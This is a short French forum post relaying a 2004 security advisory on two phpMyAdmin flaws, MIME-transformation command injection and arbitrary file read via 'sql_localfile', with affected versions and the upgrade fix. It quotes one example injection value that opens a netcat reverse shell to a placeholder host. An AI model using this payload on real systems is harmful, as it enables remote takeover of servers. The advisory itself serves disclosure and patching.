Anonyme
 19853
|  Posté : 14-12-2004 16:44
* Description Technique *
Deux vulnérabilités ont été identifiées dans phpMyAdmin, elles pourraient être exploitées par un attaquant distant afin de compromettre un système vulnérable. Le premier problème se situe au niveau des transformations externes MIME, ce qui pourrait permettre l'injection de commandes arbitraires (ex : F\';nc -e /bin/sh $IP 80;echo \'A). La seconde vulnérabilité se situe au niveau du mécanisme UploadDir et read_dump.php qui ne filtrent pas correctement la variable "sql_localfile", ce qui pourrait permettre l'accès à des fichiers arbitraires.
Note : L'exploitation de ces vulnérabilités n'est possible que si "PHP safe mode" est à "off".
* Versions Vulnérables *
phpMyAdmin versions inférieures à 2.6.1-rc1
* Solution *
phpMyAdmin version 2.6.1-rc1 :
http://www.phpmyadmin.net/home_page/downloads.php
Source : K-otik |
